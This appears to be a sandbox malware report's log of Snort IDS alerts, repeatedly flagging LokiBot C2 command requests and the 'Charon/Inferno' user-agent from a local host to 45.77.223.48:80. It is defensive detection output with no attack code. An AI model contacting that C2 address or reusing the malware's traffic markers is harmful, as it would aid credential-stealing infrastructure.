                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49759 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49759 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49759 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49761 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49761 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49761 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49762 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49762 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49762 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49763 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49763 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49763 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49764 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49764 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49764 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49765 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49765 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49765 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49766 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49766 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49766 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49767 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49767 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49767 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49768 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49768 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49768 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49769 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49769 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49769 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49770 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49770 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49770 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49771 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49771 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49771 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49772 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49772 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49772 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49773 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49773 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49773 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49774 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49774 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49774 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49775 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49775 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49775 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49776 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49776 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49776 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49777 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49777 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49777 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49778 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49778 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49778 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49779 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49779 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49779 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49780 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49780 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49780 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49781 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49781 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49781 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49782 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49782 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49782 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49783 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49783 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49783 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49784 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49784 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49784 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49785 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49785 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49785 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49786 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49786 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49786 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49787 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49787 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49787 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49788 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49788 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49788 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49789 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49789 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49789 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49791 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49791 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49791 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49792 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49792 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49792 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49793 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49793 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49793 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49794 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49794 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49794 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49795 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49795 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49795 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49796 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49796 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49796 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49797 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49797 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49797 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49798 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49798 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49798 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49799 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49799 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49799 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49800 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49800 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49800 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49801 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49801 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49801 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49802 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49802 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49802 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49803 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49803 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49803 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49804 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49804 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49804 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49805 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49805 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49805 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49806 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49806 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49806 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49807 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49807 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49807 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49808 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49808 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49808 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49809 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49809 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49809 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49810 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49810 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49810 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49811 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49811 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49811 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49812 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49812 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49812 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49813 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49813 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49813 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49814 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49814 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49814 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49815 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49815 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49815 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49816 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49816 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49816 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49817 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49817 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49817 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49818 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49818 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49818 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49819 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49819 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49819 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49820 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49820 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49820 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49821 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49821 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49821 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49822 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49822 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49822 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49823 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49823 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49823 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49824 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49824 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49824 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49825 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49825 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49825 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49826 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49826 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49826 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49827 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49827 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49827 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49828 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49828 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49828 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49829 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49829 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49829 -> 45.77.223.48:80
